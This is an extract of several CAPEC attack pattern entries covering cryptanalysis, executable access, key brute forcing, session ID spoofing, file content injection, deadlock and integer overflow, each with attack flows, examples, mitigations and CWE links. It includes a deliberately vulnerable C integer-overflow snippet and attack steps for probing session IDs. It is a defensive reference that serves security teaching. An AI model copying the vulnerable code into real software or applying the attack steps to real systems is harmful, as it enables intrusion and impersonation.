| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-01-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Gunnar Peterson | Cigital, Inc | 2007-02-28 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-09 | Review and revise | | Paco Hope | Cigital, Inc. | 2007-10-20 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 97 | | Typical Severity | Very High | | Description | Summary Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as:
1. Total Break - Finding the secret key
2. Gobal Deduction - Finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key.
3. Information Deduction - Gaining some information about plaintexts or ciphertexts that was not previously known
4. Distinguishing Algorithm - The attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits
The goal of the attacker performing cryptanalysis will depend on the specific needs of the attacker in a given attack context. In most cases, if cryptanalysis is successful at all, an attacker will not be able to go past being able to deduce some information about the plaintext (goal 3). However, that may be sufficient for an attacker, depending on the context. Attack Execution Flow An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext. An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key.
| | Attack Prerequisites | The target software utilizes some sort fo cryptographic algorithm. An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext. The encryption algorithm is known to the attacker. An attacker has access to the ciphertext. | | Typical Likelihood of Exploit |
Very Low
| | Methods of Attack | | | Examples-Instances | Description A very easy to understand (but totally inapplicable to modern cryptographic ciphers) example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed monoalphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While monoalphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis cryptanalysis uses the fact that natural language is not random and monoalphabetic substitution does not hide the statistical properties of the natural language. So if the letter "E" in an English language occurs with a certain known frequency (about 12.7%), whatever "E" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is just here to illustrate a rudimentary example of cryptanalysis. | | Attacker Skill or Knowledge Required | High - Cryptanalysis generally requires a very significant level of understanding of mathematics and computation. | | Resources Required | Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required. | | Solutions and Mitigations | Use proven cryptographic algorithms with recommended key sizes. Ensure that the algorithms are used properly. That means:
1. Not rolling out your own crypto; Use proven algorithms and implementations.
2. Choosing initialization vectors with sufficiently random numbers
3. Generating key material using good sources of randomness and avoiding known weak keys
4. Using proven protocols and their implementations.
5. Picking the most appropriate cryptographic algorithm for your usage context and data | | Attack Motivation-Consequences | - Information Leakage
- Data Modification
- Privilege Escalation
| | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 327 | Use of a Broken or Risky Cryptographic Algorithm | Targeted | | 693 | Protection Mechanism Failure | Targeted | | 719 | OWASP Top Ten 2007 Category A8 - Insecure Cryptographic Storage | Targeted |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 20 | Encryption Brute Forcing | More Detailed | |
| | Purpose | Reconnaissance | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | Wikipedia (Cryptanalysis): www.wikipedia.org | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc. | 2007-03-25 | Identified priority for pattern creation |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Evgeny Lebanidze | Cigital, Inc., | 2007-03-20 | Fleshed out content for pattern | | Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise |
|
| Attack Pattern ID | Pattern Abstraction: Standard 17 | | Typical Severity | Very High | | Description | Summary An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface. | | Attack Prerequisites | System's configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subkect and the object is set incorrectly or assumes a benign environment. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Modification of Resources
- API Abuse
| | Examples-Instances | Description Consider a directory on a web server with the following permissions
drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot
This could allow an attacker to both execute and upload and execute programs' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit. | | Attacker Skill or Knowledge Required | Low: to identify and execute against an overprivileged system interface | | Resources Required | Ability to communicate synchronously or asynchronously with server that publishes an overprivileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. | | Solutions and Mitigations | Design: Enforce principle of least privilege Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands. Implementation: Perform testing such as pentesting and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables. | | Attack Motivation-Consequences | - Run Arbitrary Code
- Data Modification
- Information Leakage
- Privilege Escalation
| | Context Description | "Attack Pattern: Direct Access to Executable Files
A privileged program is directly accessible. The program performs operations on behalf of the attacker that allow privilege escalation or shell access. For Web servers, this is often a fatal issue. If a server runs external executables provided by a user (or even simply named by a user), the user can cause the system to behave in unanticipated ways. This may be accomplished by passing in command-line options or by spinning an interactive session. A problem like this is almost always as bad as giving complete shell access to an attacker.
The most common targets for this kind of attack are Web servers. The attack is so easy that attackers have been known to use Internet search engines to find potential targets. The Altavista search engine is a great resource for attackers looking for such targets. Google works too."
[Hoglund and McGraw 04] | | Injection Vector | Payload delivered through standard communication protocols. | | Payload | Command(s) executed directly on host | | Activation Zone | Client machine and client network | | Payload Activation Impact | Enables attacker to execute server side code with any commands that the program owner has privileges to. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 285 | Improper Access Control (Authorization) | Targeted | | 272 | Least Privilege Violation | Targeted | | 59 | Failure to Resolve Links Before File Access (aka 'Link Following') | Targeted | | 282 | Improper Ownership Management | Targeted | | 275 | Permission Issues | Targeted | | 264 | Permissions, Privileges, and Access Controls | Targeted | | 270 | Privilege Context Switching Error | Targeted | | 693 | Protection Mechanism Failure | Targeted |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 1 | Accessing Functionality Not Properly Constrained by ACLs | More Detailed | |
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | Medium | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-01-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Gunnar Peterson | Cigital, Inc | 2007-02-28 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-09 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name, Description and Examples | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 20 | | Typical Severity | Low | | Description | Summary An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext. Attack Execution Flow Determine the ciphertext and the encryption algorithm. Perform an exhaustive brute force search of the keyspace, producing candidate plaintexts and observing if they make sense.
| | Attack Prerequisites | Ciphertext is known. Encryption algorithm and key size are known. | | Typical Likelihood of Exploit |
Low
| | Methods of Attack | | | Examples-Instances | Description In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the keyspace to cover. The ciphertext was decrypted in 96 days. | | Attacker Skill or Knowledge Required | Low: Brute forcing encryption does not require much skill. | | Resources Required | A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend
on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).
On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.
Obviously as N gets large the brute force approach becomes infeasible. | | Indicators-Warnings of Attack | None. This attack happens offline. | | Solutions and Mitigations | Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long. In theory a brute force attack performing an exhausitve keyspace search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months. | | Attack Motivation-Consequences | | | Context Description | Typically cryptography, if done right, will rarely be the weakest link in the system. Problems begin when people either decide to play cryptographers themselves and roll out custom crypto, use key sizes that are too small, develop their own cryptographic protocols (or misuse existing cryptographic protocols). There are some other things that can be done wrong, such as not using good sources of randomness when generating encryption keys and initialization vector values. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 326 | Weak Encryption | Targeted | | 693 | Protection Mechanism Failure | Targeted | | 719 | OWASP Top Ten 2007 Category A8 - Insecure Cryptographic Storage | Secondary |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 49 | Password Brute Forcing | More Detailed | |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eugene Lebanidze | Cigital, Inc | 2007-02-26 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-01 | Review and revision of content | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Description, Resources Required and Context Description | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 21 | | Typical Severity | High | | Description | Summary Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queueing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so.
Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes "trust" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points.
Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers.
The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system. Attack Execution Flow Explore Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target system. the attacker probes for credentials, session tokens, or entry points that bypass credentials altogether. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Spider all available pages | env-Web | | Attack known bad interfaces | env-Web env-CommProtocol env-ClientServer env-Local |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c21s1i1 | Positive | Session IDs are used | env-Web env-Peer2Peer env-ClientServer env-CommProtocol | | c21s1i2 | Positive | Open access points exist that use no user IDs or passwords, but determine authorization based on message content | env-Web env-Peer2Peer env-CommProtocol env-ClientServer env-Local |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c21s1o1 | Success | Session IDs are identifiable | | c21s1o2 | Success | Open channels are available |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c211s2s1 | Detective | Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). | | c211s2s2 | Detective | Create links on some pages that are visually hidden from web browsers. Using IFRAMES, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. | | c211s2s3 | Preventative | Actively monitor the application and either deny or redirect requests from origins that appear to be automated. | | c211s2s4 | Detective | Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). |
Experiment Fetch samples: An attacker fetches many samples of a session ID. This may be through legitimate access (logging in, legitimate connections, etc) or just systematic probing. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| An attacker makes many anonymous connections and records the session IDs assigned. | env-Web env-Peer2Peer env-CommProtocol env-ClientServer | | An attacker makes authorized connections and records the session tokens or credentials issued. | env-Web env-Peer2Peer env-CommProtocol env-ClientServer | | An attacker gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connections from it, attempting to gain the same privileges as a trusted system. | env-Peer2Peer env-CommProtocol env-ClientServer |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c21s3i1 | Positive | Trust in the system is based on IP address, MAC address, network locality, or other general network characteristic. | env-CommProtocol env-ClientServer env-Peer2Peer | | c21s3i2 | Positive | Web applications use session IDs | env-Web | | c21s3i3 | Positive | Network systems issue session IDs or connection IDs | env-CommProtocol env-ClientServer env-Peer2Peer |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c21s3o1 | Success | Systems or applications grant trust based on logical or physical network locality. | | c21s3o2 | Success | Session identifiers successfully spoofed | | C21s3o3 | Failure | No session IDs can be found or exploited |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c21s3s1 | Detective | Monitor logs for unusual amounts of invalid sessions. | | c21s3s2 | Detective | Monitor logs for unusual amounts of invalid connections or invalid requests from unauthorized hosts. |
Exploit Impersonate: An attacker can use successful experiments to impersonate an authorized user or system | Security
Controls |
|---|
| ID | Type | Description |
|---|
| c21s4s1 | Detective | Analyze logs for users or systems that are connecting from unexpected sources. | | c21s4s2 | Detective | Analyze logs for users or systems successfully requesting or performing unexpected actions. | | c21s4s3 | Corrective | If heuristics are sufficiently reliable, disconnect hosts or users that appear to be unauthorized impersonations. |
Spoofing: Bad data can be injected into the system by an attacker. | Outcome |
|---|
| ID | Type | Description |
|---|
| c21s5o1 | Success | Unauthorized data is injected into an application. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c21s5s1 | Detective | Apply heuristic evaluation to input data. This can include validating source addresses, user names, ACLs or other data that indicates authorization. This need not be done inline at the time the data is processed, but can be done after the processing has occurred to detect attack. | | c21s5s2 | Corrective | Apply transaction-based logic to systems whose initial authorization cannot be better controlled. Roll back transactions that are subsequently determined to be fraudulent or illegitimate. |
| | Attack Prerequisites | Server software must rely on weak session IDs proof and/or verification schemes | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Spoofing
- API Abuse
- Injection
| | Examples-Instances | Description Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs.
A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side.
The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application. | | Attacker Skill or Knowledge Required | Low: To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user | | Resources Required | Ability to deploy software on network. Ability to communicate synchronously or asynchronously with server | | Solutions and Mitigations | Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit. Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Implementation: If the session identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens. Implementation: If the web or application server supports it, then encrypting and/or signing the session ID (such as cookie) can protect the ID if intercepted. Design: Use strong session identifiers that are protected in transit and at rest. Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated. Implementation: Verify of authenticity of all session IDs at runtime. | | Attack Motivation-Consequences | - Privilege Escalation
- Information Leakage
- Data Modification
| | Context Description | "Attack Pattern: Session ID, Resource ID, and Blind Trust
When session and resource IDs are simple and available, attackers can use them to their advantage. Many schemes are so simple that pasting in another known ID in a message stream works.
[Hoglund and McGraw 04] | | Injection Vector | Malicious input delivered through standard service calls, e.g. FTP or posting a message to a message queue. | | Payload | Varies with instantiation of attack pattern. The main goal is so spoof or impersonate a legitimate user. | | Activation Zone | Client machine and client network (e.g. Intranet) | | Payload Activation Impact | Enables attacker to impersonate another user and access commands and data (and log behavior to audit logs) on their behalf. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 290 | Authentication Bypass by Spoofing | Targeted | | 302 | Authentication Bypass by Assumed-Immutable Data | Targeted | | 346 | Origin Validation Error | Targeted | | 539 | Information Leak Through Persistent Cookies | Secondary | | 6 | J2EE Misconfiguration: Insufficient Session-ID Length | Targeted | | 384 | Session Fixation | Secondary | | 664 | Insufficient Control of a Resource Through its Lifetime | Targeted | | 602 | Client-Side Enforcement of Server-Side Security | Targeted | | 642 | External Control of Critical State Data | Targeted |
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| Client-Server | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-01-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Gunnar Peterson | Cigital, Inc | 2007-02-28 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-10 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Description | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback | | Paco Hope | Cigital, Inc. | 2007-10-20 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 23 | | Typical Severity | Very High | | Description | Summary An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attacker's program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus. | | Attack Prerequisites | The target software must consume files. The attacker must have access to modify files that the target software will consume. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | | | Examples-Instances | Description PHP is a very popular web server. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the attacker can directly access and execute them through a browser. This vulnerability allows remote attackers to execute arbitrary code on the system, and can result in the attacker being able to erase intrusion evidence from system and application logs.
Reference - http://www.owasp.org/index.php/File_System | | Attacker Skill or Knowledge Required | Medium | | Solutions and Mitigations | Design: Enforce principle of least privilege Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example) Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution. Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host. Implementation: Virus scanning on host Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin. | | Attack Motivation-Consequences | | | Context Description | "Attack Pattern: File System Function Injection, Content Based
A protocol header or snippet of code embedded in a media file is used in a trusted function call when the file is opened by the client. Examples include music files such as MP3, archive files such as ZIP and TAR, and more complex files such as PDF and Postscript files. Common targets for this attack are Microsoft Word and Excel files, most often delivered as e-mail attachments.
An attacker typically makes use of relative paths in ZIP, RAR, TAR archive, and decompresses to get to parent directories."
[Hoglund and McGraw 04] | | Injection Vector | Payload delivered through standard communication protocols. | | Payload | Command(s) executed directly on host filesystem | | Activation Zone | Client machine and client network | | Payload Activation Impact | Enables attacker to execute server side code with any commands that the program owner has privileges to. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 77 | Failure to Sanitize Data into a Control Plane (aka 'Command Injection') | Targeted | | 23 | Relative Path Traversal | Targeted | | 22 | Path Traversal | Targeted | | 713 | OWASP Top Ten 2007 Category A2 - Injection Flaws | Targeted | | 715 | OWASP Top Ten 2007 Category A4 - Insecure Direct Object Reference | Targeted |
| | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-01-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Gunnar Peterson | Cigital, Inc | 2007-02-28 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-09 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Attack Prerequisites | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 25 | | Typical Severity | High | | Description | Summary This attack attempts to trigger and exploit a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock condition are not easy to detect. Attack Execution Flow The attacker initiates an exploratory phase to get familiar with the system. The attacker triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to finish. If the target program has a deadlock condition, the program waits indefinitevely resulting in a denial of service.
| | Attack Prerequisites | The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions (See reference, Wikipedia) The target host exposes an API to the user. | | Typical Likelihood of Exploit |
Low
| | Methods of Attack | | | Examples-Instances | Description An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock) | | Attacker Skill or Knowledge Required | Medium/High: This type of attack may be sophisticated and require knowledge about the system's resources and APIs. | | Probing Techniques | The attacker can probe by trying to hold resources and call APIs which are directly using the same resources. The attacker may try to find actions (threads, processes) competing for the same resources. | | Solutions and Mitigations | Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms). For competing actions use well known libraries which implement synchronization. | | Attack Motivation-Consequences | | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 412 | Unrestricted Lock on Critical Resource | Secondary | | 567 | Unsynchronized Access to Shared Data | Secondary | | 662 | Insufficient Synchronization | Targeted |
| | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Low | Low | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. CWE - Unrestricted Critical Resource Lock Deadlock, http://en.wikipedia.org/wiki/Deadlock | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eric Dalci | Cigital, Inc | 2007-01-25 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-07 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Likelihood and other general areas | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 92 | | Typical Severity | High | | Description | Summary This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code. Attack Execution Flow The first step is exploratory meaning the attacker looks for an integer variable that he can control. The attacker finds an integer variable that he can write into or manipulate and try to get the value of the integer out of the possible range. The integer variable is forced to have a value out of range which set its final value to an unexpected value. The target host acts on the data and unexpected behaviour may happen.
| | Attack Prerequisites | The attacker can manipulate the value of an integer variable utilized by the target host. The target host does not do proper range checkingon the variable before utilizing it. When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number) | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Modification of Resources
- Injection
- API Abuse
- Analysis
| | Examples-Instances | Description Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. Related Vulnerability Description The following code illustrates an integer overflow. The declaration of total integer as "unsigned short int" assumes that the length of the first and second arguments fits in such an integer. From "Secure Coding in C and C++" by Robert C. Seacord. Page 152, Figure 5-1
include <stdlib.h>
include <string.h>
include <stdio.h>
int main (int argc, char *const *argv)
{
if (argc !=3){
printf("Usage: prog_name <string1> <string2>\n");
exit(-1);
}
unsigned short int total;
total = strlen(argv[1])+strlen(argv[2])+1;
char * buff = (char *)malloc(total);
strcpy(buff, argv[1]);
strcpy(buff, argv[2]);
}
//Source : SAMATE.NIST.GOV : http://samate.nist.gov/SRD/view_testcase.php?login=Guest&tID=1511 | | Attacker Skill or Knowledge Required | Low : An attacker can simply overflow an integer by inserting an out of range value.
High : Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level. | | Probing Techniques | Vulnerability testing tool can be used to probe for integer overflow (e.g. fuzzer). | | Solutions and Mitigations | Use a language or compiler that performs automatic bounds checking. Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow. Use an abstraction library to abstract away risky APIs. Not a complete solution. Always do bound checking before consuming user input data. | | Attack Motivation-Consequences | - Data Modification
- Privilege Escalation
- Run Arbitrary Code
- Information Leakage
- Denial of Service
| | Context Description | An integer overflow condition exists when an integer, which has not been properly sanity checked is used in the determination of an offset or size for memory allocation, copying, concatenation, or similarly. If the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value. | | Injection Vector | The user supplied data. | | Payload | The integer overrun by the attacker. | | Activation Zone | When the function use the integer as offset, the offset may be out of the expected range which may lead to unexpected behavior such as issues of availability. | | Payload Activation Impact | The most common are issues of availability. In some situation, an integer oveflow can turn out to be an exploitable buffer overflow, then the attacker may be able to run arbitrary code on the target host. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 190 | Integer Overflow or Wraparound | Targeted | | 128 | Wrap-around Error | Targeted | | 120 | Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') | Targeted | | 122 | Heap-based Buffer Overflow | Secondary | | 196 | Unsigned to Signed Conversion Error | Secondary | | 680 | Integer Overflow to Buffer Overflow | Targeted | | 697 | Insufficient Comparison | Targeted |
| | Related Security Principles | | | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Low | Medium | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | J. Viega and G. McGraw. Building Secure Software. Addison-Wesley, 2002. CWE - Integer overflow (wrap or wraparound) Integer overflow, Secure Software - http://www.owasp.org/index.php/Integer_overflow SAMATE : samate.nist.gov | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
